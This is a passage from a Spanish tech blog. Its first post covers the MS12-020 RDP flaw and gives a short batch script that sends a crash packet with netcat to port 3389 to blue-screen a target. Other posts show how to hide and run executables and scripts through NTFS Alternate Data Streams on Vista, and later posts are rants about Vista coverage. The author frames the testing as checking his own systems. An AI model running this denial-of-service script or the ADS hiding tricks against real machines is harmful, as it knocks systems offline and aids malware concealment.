Algunas notas sobre el exploit MS12-020

Estándar

Hola a tod@s!

Llevo unos 3 días informándome sobre la vulnerabilidad que afecta a todos los servicios de Terminal Server, y he aquí la información que puedo aportar al respecto de leer y releer scripts e información adicional.

Después de leer en mi RSS post similares con información relativa a exploits públicos, los cuales revelaban que habían conseguido ejecutar código remoto , me puse a buscar dichos exploits.

El único que he encontrado, a simple vista parece que lanza una shellcode escuchando en el puerto 4444 de la posible “víctima”. Nada más lejos de la realidad.

Estuve como 45 minutos de mi triste vida intentando buscar algún port de RDP en python sin éxito. Así que estuve leyendo cosas relacionadas con el proyecto FreeRDP, para al final, confirmarse la sospecha de que el script que se encuentra publicado en Pastebin es un puto fake como una catedral, y que me costó cerca de una hora de mi vida.

Imagen 1.- FAKE como una catedral

El siguiente script que probé,  es el ya archiconocido exploit chino, el cual lleva código robado de un partner de Microsoft. En un principio se habló de una filtración en ZDI, pero Microsoft ha acabado confirmando que se ha tratado de una filtración a través de uno de sus partners.

Este exploit funciona a la perfección, pero sólo en Windows 7. He probado en un Windows XP SP3 en Spanish, y no causa ningún efecto en el sistema, salvo que éste consume todos los recursos a nivel de CPU, permaneciendo al 100% en la ejecución del exploit.

Imagen 2.- 100 % CPU exploit ms12-020

Como he comentado antes, en Windows 7 y Windows Server 2008 funciona a la perfección, pero es posible mitigar en parte este ataque, configurando el equipo para que sólo permita la autenticación basada en NLA (Network Level Authentication). Cuando configuramos esta opción, a la hora de negociar una conexión RDP contra un Server 2K8 o un Wiindows Vista/7, se obliga a autenticarse primero al cliente, antes de que el equipo que hace las veces de servidor establezca una sesión completa RDP. Esta configuración, mitigaría cualquier ataque de denegación de servicio de forma automatizada, debido a la no disponibilidad de usuario y password. En el caso de que se conozca un usuario y password de RDP, se podría seguir explotando el fallo, y automatizándolo con scripts.

Sin duda alguna, el que me ha funcionado a la perfección tanto en Windows XP como en Windows 7, ha sido el paquete de demostración que ha publicado el descubridor del fallo Luigi Auriemma. El paquete de demostración lo tiene publicado en el advisory ampliamente comentado en otros blogs y foros de internet, y funciona perfectamente.

En el propio Advisory, Luigi explica que en algunas ocasiones, se hace necesario realizar varias veces el envío del paquete malicioso para que Windows suelte un bonito BSOD, así que dicho y hecho! Como hay publicados ya muchos exploits en Python, Ruby, C y demás lenguajes, yo para probar mis sistemas he decidido realizar un cutre script en BATCH (Con dos cojones ;-)) haciendo llamadas a netcat para que realice un envío del paquete malicioso.

Probando en Windows XP y Windows 7 con el paquete mágico, con sólo el envío de 4 paquetes los dos sistemas pintan un bonito BSOD. El cutre código (Of course) aquí:

 @echo off
 echo .
 echo ##################################################################################
 echo # MS12-020 cutre script BSOD Exploit
 echo # Juan Garrido http://windowstips.wordpress.com
 echo # Tested on XPSP3 And Windows 7 32 bits
 echo # Windows 7 With NLA (NetWork Level Authentication) not Working
 echo # See more http://technet.microsoft.com/en-us/security/bulletin/ms12-020
 echo ##################################################################################
 if "%1"=="" GOTO msg
 set _IP=%1
 set _Netcat=nc.exe %_IP% 3389 ^< termdd_1.dat
 :RUN
 FOR /L %%i IN (1,1,5) DO %_Netcat%
 GOTO end
 :msg
 echo ERROR: Specify a hostname or IP address.
 echo i.e. %0 HOSTNAME
 goto end
 :end
 pause
 

Salu2 a tod@s!

 

Referencias

https://github.com/FreeRDP/FreeRDP

http://pastebin.com/fFWkezQH (FAKE como una catedral)

http://blogs.technet.com/b/msrc/archive/2012/03/16/proof-of-concept-code-available-for-ms12-020.aspx

http://pastebin.com/jzQxvnpj (Exploit funcional Windows 7)

http://technet.microsoft.com/en-us/library/cc732713.aspx (Network Level Authentication)

http://aluigi.org/adv/termdd_1-adv.txt (Advisory explicando la vulnerabilidad MS12-020)

virtualAPP con Mark Russinovich en SpringBoard

Estándar

Hola a tod@s!

Buscando información sobre la virtualización de aplicaciones, tanto en local como en remoto, y de las posibilidades de hacerlo con Windows 7, me he topado con dos vídeos muy interesantes de Mark Russinovich sobre cómo la virtualización de aplicaciones antiguas puede ayudar en procesos de migración a otros sistemas operativos.

Las sesiones (2), las podéis encontrar en los siguientes enlaces:

Windows 7 Application Compatibility Part 1

http://technet.microsoft.com/es-es/windows/dd981014.aspx?ITPID=stepcon 

El vídeo se puede descargar completito desde esta dirección  

Windows 7 Application Compatibility Part 2. Virtualization

http://technet.microsoft.com/es-es/windows/ee532933

El vídeo de esta sesión se puede descargar completito desde esta dirección

Saludos!



Altenate Data Streams en Windows Vista III de III

Estándar

Alternate Data Streams en Windows Vista I

Alternate Data Streams en Windows Vista II

En el anterior artículo realizamos pruebas de ADS en Windows Vista y como respuesta deducimos que Windows Vista todavía tiene soporte para forks en su sistema de archivos NTFS. La prueba más fehaciente es la inclusión del parámetro /R en su comando DIR, el cual listará secuencias alternativas de datos en un fichero pasado como argumento.

El soporte, en este caso y bajo este sistema operativo, es limitado en funciones y mantenido a diversos programas locales como por ejemplo el bloc de notas  o la aplicación Paint. Este tipo de soporte, como vimos en el primer artículo, puede cambiar según la política interna de Microsoft con respecto a los forks. La explicación sobre este soporte se puede consultar en el siguiente boletín.

En las pruebas realizadas con ejecutables, nos encontramos con que el comando start, (En primera instancia), ya no soporta forks bajo el sistema operativo Windows Vista, debido a que el explorador de Windows, junto con un filtro llamado Fast I/O, deniegan la ejecución. En su lugar, añaden el parámetro /R al comando DIR para buscar secuencias alternativas.

Esto dejaria a los creadores de Malware en una posición extraña, al no poder usar este método de infección en posibles usuarios que utilicen Windows Vista.

Y digo dejaria, porque Windows Vista, al tener soporte su sistema de archivos a forks, éstos, si son lanzados de determinada manera, se ejecutan sin mayores problemas.

El mayor problema ahora, y según lo que he podido averiguar, reside en el Scripting y en sus motores de ejecución.

Lenguajes como Visual Basic Script, Perl o Python soportan la ejecución de scripts, incluso si están dentro de una secuencia alternativa.

Para ejecutar las pruebas he utilizado un script para cada uno de los motores.

Script en Python

import os                                        #Importamos el módulo OS
ruta = ‘C:\Windows\system32\calc.exe’      #Path de la aplicación
os.system(ruta)                              #Ejecución de la aplicacón

Script en Perl

system(“calc.exe”);

Script en VBS

msgbox(“http://windowstips.wordpress.com“)

Estos scripts, los he introducido en un fichero llamado p0c.txt. En la siguiente imagen se refleja este acto.

dir

Imagen 1.- Secuencias alternativas en un fichero

Para la primera ejecución utilizaré el motor de ejecución de scripts que trae Windows Vista. Este motor de scripts tiene un parámetro por el cual podremos indicarle con qué motor vamos a lanzar el script.

cscript

Imagen 2.- Ejecución de ADS a través motor de Scripting

En la segunda ejecución utilizaré el motor de ejecución de scripts de Python para lanzar un sencillo script que abra la calculadora de Windows.

python

Imagen 3.- Ejecución de ADS a través del motor de Python

En la tercera y última ejecución, utilizaremos el motor de ejecución de scripts de Perl para lanzar otro sencillo script que abra la calculadora de Windows.

perl

Imagen 4.- Ejecución de ADS a través del motor de Perl

Como se puede comprobar, la ventana de propagación de malware a través de esta técnica todavía está vigente en Windows Vista, con lo que tendremos que seguir protegiéndonos de la misma manera con la que nos protegíamos cuando teníamos Windows 2K/XP/2K3.

Saludetes!

Referencias

ADS Qué es y cómo funciona

The Dark Side NTFS

Windows Vista y Alternate Data Streams parte II de III

Estándar

Como comentamos en la primera parte de  estos tres artículos dedicados a los ADS (Alternate Data Streams) en Windows Vista, fácilmente se llega a la conclusión de que Vista sigue soportando de forma nativa los forks o ADS en su sistema de ficheros.
La primera prueba que haremos para verificar si Vista sigue soportando los ADS es sencilla, y no es más que intentar crear un ADS de la misma forma en que la hemos estado creando estos últimos años con XP/2K3.

Foto1

Imagen 1.- Creación de ADS en Windows Vista

En la imagen anterior se pueden apreciar varias cosas:

- El ADS se puede crear perfectamente y se puede visualizar de forma correcta con el comando MORE

- Tal y como se puede leer en el artículo Q101353 de Spectra, los dos puntos que hacen referencia a un ADS, pueden variar en un futuro. En Windows Vista esta convención sigue vigente, tal y como se muestra en la imagen anterior.

En ese mismo artículo se cita algo muy importante. Y es que algunos comandos soportan múltiples ADS y otros no.
En Windows XP, el comando START soporta de forma nativa este tipo de flujos de datos, pudiendo acceder de forma correcta a ellos. La sintaxis que se seguía y se sigue usando es la siguiente:

start RUTA_FICHERO:ADS

Si el intérprete de comandos se encuentra en la misma ruta en donde se encuentra el fichero a iniciar, se puede ejecutar el comando START de la siguiente manera:

start .\Fichero:ADS

Foto2

Imagen 2.- Error de ejecución en comando START bajo Windows Vista

En la imagen anterior nos encontramos con algo muy interesante, y es que el comando START, ejecutado en Windows Vista,  manda ejecutar el ADS, pero el explorador de Windows no encuentra una aplicación adecuada para poder abrir el fichero. Si realizamos la misma operación, pero analizando las llamadas que se realizan al sistema operativo, nos encontramos con que el comando es válido y que accede al ADS correctamente. El explorador de Windows es el que no puede encontrar una aplicación adecuada para abrir este tipo de fichero (En este caso el notepad). El resultado que obtiene el explorador de Windows para este evento es NAME INVALID.

Foto3

Imagen 3.- Evento NAME INVALID Process Monitor

FOTO4

Imagen 4.- Evento Process Monitor

En este caso, y para que Windows Vista ejecute la aplicación asociada a a este fichero, tendremos que invocar directamente a la aplicación que deseemos utilizar para visualizar este ADS. En nuestro caso utilizaremos el Notepad.

Foto5

Imagen 5.- Ejecución ADS en Windows Vista

Como se puede comprobar, la aplicación notepad sigue teniendo soporte para los forks en el sistema de ficheros. Se puede repetir este mismo proceso, pero con otro archivo, como una imagen por ejemplo. Así se puede comprobar qué aplicación soporta ADS y qué aplicación no.

foto6

Imagen 6.- Ejecución ADS en Windows Vista

Tal y como comenté en otro artículo dedicado a los ADS, muchos de los creadores de Malware utilizan este tipo de técnicas para dar “jugo” a sus creaciones. Entre todas ellas, los ADS se pueden utilizar para:

- Ocultación de datos
– BBDD
– Ejecutar ficheros binarios (EXE, MSI, BAT, COM, VBS)

Con respecto a Windows XP/2K3, Windows Vista ha cambiado su modelo de ejecutar archivos ejecutables dentro de un ADS.

Si introducimos un archivo ejecutable dentro de un ADS tal que así:

type p0C.exe > fichero.txt:malware.exe
start .\fichero.txt:malware.exe

Obtendremos un bonito error igual que el visto en la imagen número II. Si monitorizamos las llamadas al sistema, vemos que el sistema operativo es capaz de abrir el fichero, pero se encuentra con un error al tipear el comando START. Un resultado llamado FAST IO DISALLOWED.
Bajo mi punto de vista, y según lo que he podido averiguar, este error (FAST IO DISALLOWED) de acceso es causado por un filtro que maneja las operaciones de entrada y salida del sistema de ficheros. Aunque el fichero se puede abrir sin ningún problema, el filtro rechaza la operación, se genera la advertencia de nombre inválido (NAME INVALID) y posteriormente genera el error por pantalla.

Esta duda la dejo abierta, por si nos lee algún otro Forensic-Boy y nos quiere arrojar más luz sobre el asunto.

En una primera instancia, los resultados obtenidos nos dicen algo bueno para la seguridad del equipo. Y es que en Windows Vista no se pueden invocar archivos ejecutables a través de ADS. En la tercera y última parte, seguiremos con las pruebas (Esta vez con archivos ejecutables) y repasaremos las posibles vías de infección con malware ejecutable que se pueden presentar en Windows Vista y NTFS, utilizando forks.

Saludos a tod@s!

Referencias

Disallowing a Fast I/O Operation in a Preoperation Callback Routine

Fast I/O

Managed file system filter model and architecture (Patente) 

Malware y WordPress

Windows Vista y los Alternate Data Streams I parte

Estándar

Hola a tod@s!

En esta ocasión, y, tras haber leído en estos últimos días nuevos artículos que hablan sobre los flujos de datos en sistemas de archivos NTFS, me he decidido a escribir dos pequeñas entradas en el blog acerca de los flujos de datos en sistemas de archivos NTFS, pero esta vez realizando las pruebas en mi flamante Windows Vista. Los nuevos artículos que he leído no arrojan nada nuevo, realizando las mismas pruebas de hace 7 años,  y, en algunos casos, fomentan la desconfianza general sobre el sistema de archivos NTFS, dando a creer al usuario, en ciertos párrafos, que la mejor alternativa es “volver” a viejos sistemas de ficheros como FAT o FAT32.

Empezamos!

Al soportar Windows Vista casi íntegramente el formato NTFS, es lógico llegar a la conclusión de que Windows Vista soporta de forma nativa los Alternate Data Streams (En adelante ADS). El caso que nos ocupa en estos tres artículos es la forma en la que Windows Vista accede a esta característica.

Al contrario de lo que he leído estas últimas semanas en los artículos que referencian a ADS, sólo muestran inquietud en el formato de archivos NTFS, y, en especial, a pruebas realizadas en Windows 2000 y XP/2K3.

Microsoft adoptó la decisión de soportar este tipo de datos asociados (llamados forks) en el sistema de archivos NTFS, ya que en su día, multitud de sistemas de archivos dotaban de esta característica a sus sistemas de archivos. Hoy día, existen multitud de sistemas de ficheros que soportan de forma nativa esta característica.

Los forks, al igual que los atributos extendidos, se utilizaban antiguamente para mantener información adicional sobre un fichero o directorio, sin cambiar la estructura del mismo, es decir, sin modificar el fichero.

Sistemas de ficheros como HFS (Hierarquical File System), UFS (Unix File System), o UDF (Universal Disk Format) soportan estas características (forks o atributos extendidos).

Volviendo al tema de arquitectura de ficheros NTFS, el stream de datos se identifica a través de los “:” (sin comillas). Según Microsoft, en el sistema operativo, residen comandos que pueden o no soportar estos flujos de datos, y que en cierta manera depende de ellos si le dan soporte o no a ese comando en un futuro. Lo mismo pasaria en el caso contrario, en donde tuviésemos un comando que soporta de forma nativa estos flujos de datos y en un futuro no. Según Microsoft, la identificación de los dos puntos para relacionar el flujo de datos podría cambiar en un futuro.

En posteriores artículos veremos en qué manera ha cambiado Windows Vista en el soporte de ADS.

Referencias

Windows NT Supports Multiple Data Streams Inconsistently

How To Use NTFS Alternate Data Streams

Fork (filesystem)

The Data Fork and the Resource Fork

Universal Disk Format 

Hasta la próxima entrega!

Y todo para nada…

Estándar

Las líneas de negocio están para eso, para abrir negocio donde antes no lo había, o había poco. Se puede destruir empleo por un lado, pero lo que sí es seguro es que generará empleo por el otro lado.

Pero todas las líneas de negocio existentes se van a tomar por el ·@%%&&.  Porque llega el articulazo del siglo. Donde esté un ordenador barato, que se quite uno potente.

Reflexionemos un poco…

Microsoft hace sistemas operativos y sus programas cada vez más pesados, que necesitan cada vez más recursos del sistema. Así todos son felices. Microsoft vende sus sistemas operativos, sus Office, etc, y, como los computadores en un momento determinado no los corren bien, la gente migra más rápidamente a procesadores más rápidos para correr estos programas. Así viene pasando desde Windows 95.

El problema, y el fracaso de Vista, es que ahora las cosas son un poco diferentes…

Por un lado, Vista exageró demasiado en cuanto a los recursos que necesita, no pudiendo correr sino solo en los procesadores más avanzados, impidiendo de esta manera las actualizaciones de XP a Vista. Era necesario comprar una máquina nueva y costosa. Por otro lado, XP sigue siendo suficientemente bueno y no justifica comprarse un nuevo computador para poder disfrutar de Vista.

Sí, sí, sí, sí…. Spectra es malísima. Muy mala. Una cabrona vamos. Cada día hace sus programas más gordos (Creo que les dan harina y maizena), que necesitan más recursos y todos felices. Como los equipos antiguos no pueden, pues a comprar hardware nuevo.

Vista es un fracaso. Y del bueno te digo yo.

O sea, a ver si lo he entendido. Que donde esté un Windows95 o una mini-distribución de Linux, que se quiten las demás. Que donde esté mi procesador 486, que se quiten los demás. Porque todavía tengo uno en casa y le podría instalar un Windows 95. Creéis que ligaría en un bar si le digo a una chica que he instalado un Windows 95 en un 486… Y que funciona?

Me lloran los ojitos porque leo por primera vez en la ciudad de los Krispis que XP sigue siendo suficientemente bueno…. Se estarán pasando poco a poco al lado del mal?

Huelo a conspiración….

Por otro lado, dado el enorme poder de los microprocesadores de hoy, pueden aparecer computadores muy baratos (de menos de $300) y no tan potentes, pero que pueden hacer todo el trabajo cotidiano de oficina (procesador de palabras, hojas de cálculo, presentación gráfica, etc), además de navegar por Internet, correo, mensajería instantánea, etc.

Estos computadores baratos pueden trabajar bien con un sistema operativo no tan pesado como Vista. Funcionan bien con XP o Linux. Y aquí es donde está el problema de Microsoft y la industria en general.

Los computadores pobres de hoy en día pueden hacer el 99% del trabajo cotidiano de oficina y del hogar. ¿Para qué comprarse lo último?. En la mayoría de los casos no se justifica.

Entonces tenemos dos extremos. Por un lado, un computador muy sencillito pero que puede ejecutar el 99% de las cosas, y por el otro, uno muy poderoso (necesario para alimentar a Windows Vista).

En cuanto al primer párrafo no tengo problemas. Es totalmente cierto. Tengo en casa otro PC con 512 RAM y procesador de 1GB y rula con Debian y XP de maravilla. Pero sigo sin ver el problema.

Spectra tiene, para aquellos que se quieran dejar engañar, porque es muy mala, una página dedicada a esos equipitos que no llegan al mínimo para poder acostarse con Vista, y son los llamados Vista Capable.

Lo de los dos extremos me queda muy clarito.

Microsoft se ve forzado a prolongar el XP porque de no hacerlo pierde el mercado de los computadores más sencillos, mercado que crecerá mucho en los próximos años.

No hay aplicaciones que usen tanto poder proveniente de los microprocesadores de hoy. Solo Windows Vista, los juegos y el procesamiento y edición de video, pero en pocos años, todo procesador, hasta el más pobre será capaz de manejar estas cosas. Así que el extremo de computadores muy poderosos, para uso personal tenderá a morir, quedando sólo los computadores económicos de menos de $200. Nadie necesitará un procesador de 16 núcleos, porque no habrá aplicaciones que necesiten tanto poder (para uso personal).

Este inmenso poder de los procesadores del futuro sólo lo usarán los que quieran correr aplicaciones como pronóstico del clima y otras similares, pero nunca una persona en su procesador de palabras, hoja de cálculo o incluso editando video.

Una alternativa para el uso de tanto poder, que es válida incluso hoy en día (en donde un procesador con 2 núcleos de 2 Ghz es mucho más de lo que se necesita en tareas cotidianas) sería que el computador tuviera 2 ó 4 salidas de video, y sus teclados y ratones respectivos. Así un computador manejaría 4 usuarios simultáneamente.

Un computador Core Duo está el 99% del tiempo sin uso, así que con los 4 usuarios estaría de una manera muy similar, y los 4 sentirían todo el poder para cada uno de ellos como si los demás no existieran (salvo en algún que otro momento en donde habría pequeños cuellos de botella).

Si se configura Linux para manejar estos 4 usuarios simultáneamente en un computador, sería el final de Windows, porque con sólo añadirle unas cuantas tarjetas de video (con sus respectivos controladores de teclado y ratón) se abaratarían los costos del computador para las empresas, escuelas, etc: 1 computador $400 + 4 tarjetas de video sencillas $25 c/u dan un total de $500, dividido entre cuatro personas, sale a $125 por “terminal”.

Spectra es que es así. Se acojona y tiene que prolongar un producto. A mi también me lo dijo un primo de la novia de un amigo mío. Lo que no me dijo el primo de la novia de un amigo mío es que en la página de soporte de Spectra, tienes todos los datos de soporte, y de ahí es de donde se sacan los DATOS. Si quieres mirar hasta cuando vas a tener soporte (normal y extendido) te puedes pasar para recabar datos malignos. Los tienes para Windows XP e incluso para Windows Vista, así seguro que tienes datos para vaticinar el fin de Windows Vista. Pero claro, eso a una empresa se la repamplinfa. Se la suda que un Windows tenga un soporte de casi 14 AÑOS. Donde esté un Ubuntu licenciado con soporte a 3 años que se quite lo demás. Que me llega una incompatibilidad con una aplicación en mi Ubuntu? pues nada. O MIGRO a una distribución más novedosa, o tiraré de FOROS. Ya estoy viendo un problema de nivel 5 (O sea jodidísimo para la empresa), el soporte Server Ubuntu que se ha terminado (5 añitos), y el SysAdmin de la empresa poniendo todos sus recursos en un forero de 17 años. Qué hijadeputa es Spectra que te da casi 14 AÑOS para que te plantees una migración, te planta los Virtual Lab para que te vayas haciendo a la idea, los recursos para profesionales como los WebCast. Además son malísimos, porque si te has perdido uno, te los graban!

Y claro, el inmenso poder de los procesadores del futuro sólo lo usarán los que quieran correr aplicaciones como pronóstico de clima….. Y para  predecir el futuro creo…. Esto es gracioso, porque yo tengo un procesador de 1GB en casa, pero mi tía que quiere el ordenador para llevar sus tareas de costura “al día”, se fue a comprar un equipo, y de menos de dos núcleos no había nada…. Aunque claro, también se puede pasar por DELL y comprar un Ubuntu de igual precio y menores características.

Sobre los dos últimos párrafos…. No comment…. Este no sabe lo que es un AS/400, ni SAP, ni Operations Manager, ni IBM Tivoli Security Operations Manager, ni SMS, ni Dynamics

O sea, que a ver si no lo he entendido tampoco. Un equipo antiguo, pongámosle (512/256 RAM con un Pentium IV) y un cliente de correo electrónico, la consola de SAP que conecta con un servidor (Ya sabes, definido en el Saplogon.ini), la consola 5250 del AS/400, el office (Word, Excel, PPT, etc..) y accediendo en todo momento a recursos compartidos (Para tenerlo todo un pelín más seguro) va de puta madre no? Y ya no digo de puta madre (que puede ir según el caso y la metodología de trabajo de cada uno), sino que irá de puta madre repartiendo recursos en 4 pantallas tontas. Que eso de la inversión y el reciclado de equipos es una panacea y no vale para nada. Que es preferible un equipo que “gaste” 256 de RAM y los otros 256 de RAM que me sobran (si es que tiene de sobra) lo tengo “por si las moscas”. Windows Vista gasta más RAM porque el acceso a ella es MAS RÁPIDO, así deja al disco tranquilo para que nos dure más. Eso de los discos duros híbridos con una memoria de precarga es otra panacea. Otro sacaero de dinero.. Total, el acceso a disco según tú es más rápido que el acceso a RAM. Si se peta seguro que es por un “cuello de botella”.

El otro día instalé un IIS 6 en un W2k3 en un PIII con 256 de RAM, un SQL Server 2000 como motor de BBDD y que servía una pequeña Web. Según tú, si me llama el cliente, le diré que cuando el servidor deje de servir páginas con rapidez, será por un “cuello de botella”… O también le puedo decir que los cuellos de botella empiezan cuando haya más de 15 usuarios en paralelo pidiendo servicios…

Microsoft no podría competir con esto. Primero su Windows Vista está hecho para consumir muchos recursos (y producir una obsolescencia planificada de todos los computadores), no sirve para computadores económicos. Por otro lado, a Microsoft no le interesaría vender una sola licencia de XP, por ejemplo, para que 4 usuarios manejen sus “terminales”, sino más bien una licencia por cada terminal. Sin embargo, Linux, que es liviano, y puede manejar estos 4 usuarios no tiene ningún problema, y con computadores tan baratos como $125 por persona, no tiene competencia en empresas, escuelas, cybercafés, etc.

Aquí sólo te puedo decir una cosa. En la Universidad tenemos Windows NT y solaris del año de la castaña, y una de las prácticas de Redes era conectar dos Windows 98 a través de una red AdHoc… La práctica de Linux era conectar varios equipos a través de recursos compartidos por Samba. En definitiva, sales con una base cojonuda para la vida real, y los ingenieros están preparados para afrontar un nuevo reto (pasar de una práctica con un Windows98 y WinNT, a un problema en la vida real en un entorno heterogéneo Win-Linux en sus últimas versiones).

En definitiva, creo que esta nueva línea de negocio, hará por fin que el departamento HelpDesk deje de recibir llamadas del tipo “Mi ordenador va lento”, “Se me traba”, “Esto va como cámara lenta”, etc…

Y ya dejo de escribir, porque me lloran los ojitos….

En definitiva, que nos hemos equivocado, y como quiero redimirme, cuelgo aquí la fotografía que me pasó mi hermano Maligno cuando estuvimos en el Asegur@IT II que se celebró en BCN. Como diría el Trianero….

Va por ustedes…

 Fotografía del evento (Renombrar PDF por HTML si la queréis guardar de recuerdo)

1Saludo!!

La tengo muy pequeña, según dicen…

Estándar

Pues sí, queridos amig@s… Al parecer, y según mi SPAM, la tengo muyyyy pequeñita, porque no hacen más que mandarme estupendos mails para arreglar mi “problema”….

Y aquí estoy, indeciso entre comprar N Viagras porque los demás dicen que no se me levanta, o comprarme un aparatito de estos que te sube la bilirrubina, porque si 2000 mails dicen que la tienes pequeña, será porque la tendré pequeña no?

La historia es la siguiente:

Las personas se mueven por muchas cosas y por muchos motivos, entre ellos, los complejos. Complejo de no ser el centro de atención, de no llegar a ser lo que se espera de él, de bajito, de orejón (como yo!!), de cabezón, etc… Luego están los que tienen complejo de GILIPOLLAS, pero de eso hablaremos después…

Los otros saben que la gente tiene complejos, y que por un complejo nos podemos ver motivados a realizar un trabajo de distintas maneras, o dar (o no dar) una opinión. Y qué hacen? empiezan a trabajar sobre esa bola de complejos para hacernos creer algo, o para vendernos algo…

El SPAM es muy parecido en ese aspecto, y lo cierto es que da sus frutos. Es la espina de los correos, tanto en su forma de papel, (Los panfletos de Tecnokely!!), como en su forma digital, y tiene dificil solución. De 1.000.000 de correos que se le envían a 1.000.000 de personas, n+1 la tiene que tener pequeña, y de ese n+1 tiene que haber n que tenga complejos. Ese es el que me va a comprar. Es estadística pura y dura. Sencillo, claro y directo.

Eso es lo que yo siento al leer ciertos blogs, periódicos y artículos (WTF??), realizados por la gente “que sabe”….

Y de aquí pasamos directamente a ese complejo al que no queremos llegar, pero que hay gente que llega. Ese complejo difícil de quitar, pero fácil de adquirir. No es ni más ni menos que el complejo de GILIPOLLAS.

Por qué carajo cuando estoy buscando información sobre algo que no está relacionado con la informática (como el ponno) me salen artículos como éste?

Microsoft podría dar carpetazo a Vista

Joder!!!! Mierrrrrda!! Cojones!!!!

Y yo que llevo más de 2 años de betatester del Vista, escribiendo en foros y redactando artículos, y va este y me dice que alguien le ha dicho que su primo leyó en la ciudad de los Krispis un copy/paste de una reseña del Wikipedia (muy fiable eso sí…) en la que ponía que Windows Vista se acaba, y que en su lugar sale al mercado el nuevo Windows Seven!

Y ahora digo yo…. Me cago en todo lo que se menea! Y me lo dicen ahora??

Me ha entrado hasta fiebre. Me he ido a casa amargado. Pero mi Matias me ha abrazado, y me ha echado un cubatita fresquito…. Después de beberme N cubatas he tenido un momento de lucidez, y me he leído el artículo entero.

El caso es que el batacazo de Microsoft con Windows Vista está adquiriendo dimensiones planetarias: primero fueron los principales fabricantes de ordenadores, que hartos de toparse con sus call-centers saturados con llamadas de clientes desesperados por el sistema operativo, decidieron dar la opción a los usuarios de, o bien volver al fiable XP, o directamente comprar el ordenador con esta versión de Windows corriendo.

Me imagino yo las llamadas de los Call-Centers….

Cliente: Oiga?

CallCenter: Sí dígame?

Cliente: Mi Windows Vista es una puta mierda

CallCenter: Por?

Cliente: No puedo instalar mi aplicación. Me dice que no es compatible

CallCenter: Vaya…. Y qué aplicación es?

Cliente: Comandante Norton. Para mí es imprescindible

CallCenter:…..

Y no es que tenga nada en contra de los Call Centers… Pero alguno ya habrá tenido que lidiar con los de Telefónica, Ono y demases. Yo mismo he presenciado en directo como un “Técnico” de ONO intentó meter un cable de teléfono (RJ-11) en una toma de RJ-45….

Y esta señorita tan simpática también resume su caso con ONO y las IP con sobrepeso…. Sin desperdicio…

ONO y las IP Gordas

 ONO y las IP Gordas II

En finsss…. Sigamos con la lucidez….

Por si esto fuera poco, la prestigiosa revista PC World no ha dudado en calificar a Vista como la “decepción tecnológica del año”, un duro golpe para el jubilado Bill Gates.

Vaya, creo que es la misma PCWorld que tiene un apartado especialmente dedicado a Windows Vista, e incluso tienen una Web muy chula y con la que venden mucho….

Estando así el panorama, la dirección de Microsoft urgió a la división responsable del desaguisado, a lanzar un service pack (actualización de software) que calmara los ánimos por el momento y así intentar reconducir el buque a la deriva

Claro (CAPULLO de alhelí), como Windows no tiene SOPORTE, para qué carajo van a sacar un ServicePack? Para qué carajo van a sacar un hotfix para cuando algo falla? Tú lo compras y ya está. Pero claro, así es caro. Caro de cojones. Pero como tiene SOPORTE, estos chicos te sacan un ServicePack para aumentar sus posibilidades y parchear bugs y fallos de seguridad, y como Windows Vista tendrá como mínimo 10 años de soporte, el precio de un Vista lo divides entre 10, y no te da ni para comprarte una cervecita en mi barrio. TRIANA!!. Pero eso ya lo sabías no SUPERTECNICO?

Lejos de ello, y como a perro flaco todo son pulgas, el equipo de desarrollo de XP -viendo que su criatura todavía tenía mucho recorrido- está pertrechando otro service pack que a la vista de los resultados podría amargar la jubilación de Gates: XP sería considerablemente más rápido que Vista, o lo que es lo mismo, se confirmaría que el enemigo lo tienen en casa.

Total, como Windows Vista ya ha salido, al carajo con lo demás. Sin soporte. Listillo! Comenta a las empresas que todos los Windows que han comprado no llevarán en su vida útil ningún ServicePack nin ningún parche! Te deseo suerte SUPERTECNICO!

Lejos ya de mirar el contenido técnico del artículo, investigando a ver si el escritor me ha querido decir “algo”, y lo ha hecho escribiendo entre líneas, me he puesto a investigar la sabiduría técnica de este señor llamado Joselito Mendiola.

Este SUPERTECNICO de signo Virgo, y adorador de las nuevas tecnologías (Gadgets!), es Licenciado en Ciencias económicas y redactor de artículos relacionados con nuevas tecnologías.

Y ahora pregunto yo…. Señor SUPERTECNICO, acaso no se ha leído las nuevas bondades de Windows Vista?

Acaso no se ha leído la respuesta de Microsoft sobre la especulación de ese sistema operativo llamado Windows 7 y que casualmente se parece mucho a VISTA??

O acaso sus únicas fuentes de información son ésta o ésta?

Yo antes no creía en los signos zodiacales, pero he cambiado de opinión. Este señor nació en el año del Gallo, así que…. Podemos llamarle PapaGallos?

Por favor, dejen a los profesionales hacer su trabajo.

Por cierto… La economía está hecha una puta mierda…. Espero que tú no tengas nada que ver….

Gudbai!!

Vista ha muerto. Lo dicen los profesionales

Estándar

El otro día me pasaron un par de enlaces en correos distintos sobre noticias de Windows Vista. Uno de ellos era de la ciudad de los krispis, en la que dicen que Windows Vista tendrá un sucesor de aquí a 6-9 meses más o menos. Esto me hace pensar una cosita, y es que tal vez Windows Vista sea una madre, una virgen embarazada que va a dar a luz a otro sistemita, otro niño feo al que nadie quiere. Otro WinMe maquillado.

En el otro mail, viene un enlace que en su interior, se esconde un post muy estudiado. Un post de esos que enseguida reconoces el talento y la profesionalidad de quien lo escribe. Alguien que se ha tomado la molestia de instalar Windows Vista y navegar durante 5 minutos. 40 instalación + 5 minutos navegación + 15 minutos post = 60 minutos de profesionalidad en el post.

es dificil decepcionarme, porque esperaba muy poco, y aun asi me ha “decepcionado” (en comillas, porque realmente esperaba poco..poco)

la montaña pario un raton, y ese raton lo han llamado windows vista.

no es un nuevo sistema operativo. simplemente es XP, al que le han puesto otro kernel, y han empezado a construir un nuevo estilo (mas web) de los interfaces del sistema y del explorador de fichero. Pero lo que yo he visto, es que estos nuevos interfaces apenas tocan el numero de ventanas que tiene XP/Vista.

Me quedo con lo de simplemente es XP, al que le han puesto otro kernel…..

Vamos a ver CEPORRO, respecto al kernel de Spectra Vista, quizás no conozcas algunas de sus características, como el Kernel Patch protection en versiones de 64 bits, la cual ya funcionaba en Spectra XP en su versión de 64 bits, y en Spectra 2003, también en 64 bits. Una función que protege la integridad del Kernel, impidiendo a las aplicaciones parchear las estructuras para así manipular la máquina a su antojo. Te suenan de algo los ROOTKITS?

